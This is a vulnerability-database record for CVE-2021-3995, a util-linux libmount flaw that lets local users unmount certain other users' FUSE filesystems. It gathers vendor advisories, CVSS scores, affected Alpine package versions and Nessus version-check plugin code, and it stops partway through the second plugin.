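A logic error was found in the libmount library of util-linux, in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users: those whose UID, written as a decimal string, is a prefix of the attacker's own UID (constructed example: a filesystem owned by UID 1000 when the attacker's UID is 10001). An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. The Alpine record below lists util-linux packages older than 2.37.3-r0 as affected, so on Alpine hosts the installed util-linux version is the thing to check.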
{"id": "ALPINE:CVE-2021-3995", "vendorId": null, "type": "alpinelinux", "bulletinFamily": "unix", "title": "CVE-2021-3995", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "published": "2022-08-23T20:15:00", "modified": "2023-02-03T23:30:00", "epss": [{"cve": "CVE-2021-3995", "epss": 0.00042, "percentile": 0.05731, "modified": "2023-12-02"}], "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 1.7}, "severity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://security.alpinelinux.org/vuln/CVE-2021-3995", "reporter": "Alpine Linux Development Team", "references": [], "cvelist": ["CVE-2021-3995"], "immutableFields": [], "lastseen": "2023-12-02T17:25:19", "viewCount": 18, "enchantments": {"score": {"value": 6.5, 
"vector": "NONE"}, "dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987"]}, {"type": "cbl_mariner", "idList": ["CBLMARINER:10709"]}, {"type": "cve", "idList": ["CVE-2021-3995"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5055-1:E8123"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-3995"]}, {"type": "fedora", "idList": ["FEDORA:71F07304C271"]}, {"type": "mageia", "idList": ["MGASA-2022-0076"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-086.NASL", "AL2022_ALAS2022-2022-099.NASL", "AL2022_ALAS2022-2022-218.NASL", "AL2023_ALAS2023-2023-024.NASL", "DEBIAN_DSA-5055.NASL", "EULEROS_SA-2022-1440.NASL", "EULEROS_SA-2022-1461.NASL", "EULEROS_SA-2022-1616.NASL", "EULEROS_SA-2022-1640.NASL", "EULEROS_SA-2022-1654.NASL", "EULEROS_SA-2022-1668.NASL", "EULEROS_SA-2022-2041.NASL", "EULEROS_SA-2022-2069.NASL", "OPENSUSE-2022-0727-1.NASL", "SUSE_SU-2022-0727-1.NASL", "UBUNTU_USN-5279-1.NASL"]}, {"type": "osv", "idList": ["OSV:CVE-2021-3995", "OSV:DSA-5055-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:170176"]}, {"type": "photon", "idList": ["PHSA-2022-0147", "PHSA-2022-4.0-0147"]}, {"type": "prion", "idList": ["PRION:CVE-2021-3995"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9F041FBF31AA14C1B0593ECDE945330B"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3995"]}, {"type": "redos", "idList": ["ROS-20220128-03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0727-1"]}, {"type": "thn", "idList": ["THN:85C69AD4617097A82E6BB57E4EBB6186"]}, {"type": "ubuntu", "idList": ["USN-5279-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3995"]}, {"type": "veracode", "idList": ["VERACODE:33917"]}, {"type": "zdt", "idList": ["1337DAY-ID-38096"]}]}, "vulnersScore": 6.5}, "_state": {"score": 1701538112, "dependencies": 0}, "_internal": {"score_hash": "d4c8441bac8d231acc3e9f025ade139b"}, "affectedPackage": [{"OS": "Alpine", "OSVersion": "edge-main", "packageFilename": "UNKNOWN", "arch": "noarch", 
"packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.12-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.13-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.14-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.15-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.16-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.17-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.18-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}]}
{"veracode": [{"lastseen": "2023-04-18T06:22:15", "description": "util-linux is vulnerable to denial of service. The vulnerability exists due to a logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-26T14:30:50", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-04T01:37:07", "id": "VERACODE:33917", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33917/summary", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2023-02-04T02:20:20", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {}, "published": "2022-08-23T20:15:00", "type": "osv", "title": "CVE-2021-3995", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-04T02:20:15", "id": "OSV:CVE-2021-3995", "href": "https://osv.dev/vulnerability/CVE-2021-3995", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:20:42", "description": "\nThe Qualys Research Labs discovered two vulnerabilities in util-linux's\nlibmount. These flaws allow an unprivileged user to unmount other users'\nfilesystems that are either world-writable themselves or mounted in a\nworld-writable directory \n([\\\nCVE-2021-3996](https://security-tracker.debian.org/tracker/CVE-2021-3996)), or to unmount FUSE filesystems that belong to certain other \nusers \n([\\\nCVE-2021-3995](https://security-tracker.debian.org/tracker/CVE-2021-3995)).\n\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.1-8+deb11u1.\n\n\nWe recommend that you upgrade your util-linux packages.\n\n\nFor the detailed security status of util-linux please refer to its\nsecurity tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/util-linux](https://security-tracker.debian.org/tracker/util-linux)\n\n\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "osv", "title": "util-linux - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-08-10T07:20:40", "id": "OSV:DSA-5055-1", "href": "https://osv.dev/vulnerability/DSA-5055-1", "cvss": {"score": 0.0, "vector": "NONE"}}], "cbl_mariner": [{"lastseen": "2023-12-02T08:18:16", "description": "CVE-2021-3995 affecting package util-linux 2.32.1-7. 
This CVE either no longer is or was never applicable.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-12-02T08:18:16", "type": "cbl_mariner", "title": "CVE-2021-3995 affecting package util-linux 2.32.1-7", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-12-02T08:18:16", "id": "CBLMARINER:10709", "href": "", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2023-12-02T18:30:47", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "debiancve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2022-08-23T20:15:00", "id": "DEBIANCVE:CVE-2021-3995", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-02T13:47:49", "description": "A logic error was found in the libmount library of util-linux in the\nfunction that allows an unprivileged user to unmount a FUSE filesystem.\nThis flaw allows an unprivileged local attacker to unmount FUSE filesystems\nthat belong to certain other users who have a UID that is a prefix of the\nUID of the attacker in its string form. 
An attacker may use this flaw to\ncause a denial of service to applications that use the affected\nfilesystems.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | introduced in 5fea669e9ef0a08804f72bb40f859f239f68c30a (v2.34)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-01T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2022-02-01T00:00:00", "id": "UB:CVE-2021-3995", "href": "https://ubuntu.com/security/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "prion": [{"lastseen": "2023-11-22T01:01:07", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-03T23:30:00", "id": "PRION:CVE-2021-3995", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-12-02T15:50:31", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "cve", "title": "CVE-2021-3995", "cwe": ["CWE-552"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-03T23:30:00", "cpe": ["cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-3995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2023-12-02T17:35:38", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-24T12:39:50", "type": "redhatcve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-04-06T08:11:30", "id": "RH:CVE-2021-3995", "href": "https://access.redhat.com/security/cve/cve-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-11-01T15:22:58", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. 
This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1654)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1654.NASL", "href": "https://www.tenable.com/plugins/nessus/160673", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160673);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP10 
: util-linux (EulerOS-SA-2022-1654)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1654\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9180647\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.2-2.h23.eulerosv2r10\",\n \"libfdisk-2.35.2-2.h23.eulerosv2r10\",\n \"libmount-2.35.2-2.h23.eulerosv2r10\",\n \"libsmartcols-2.35.2-2.h23.eulerosv2r10\",\n \"libuuid-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-user-2.35.2-2.h23.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 
0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:47", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-04-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1461)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1461.NASL", "href": "https://www.tenable.com/plugins/nessus/159776", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159776);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1461)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was 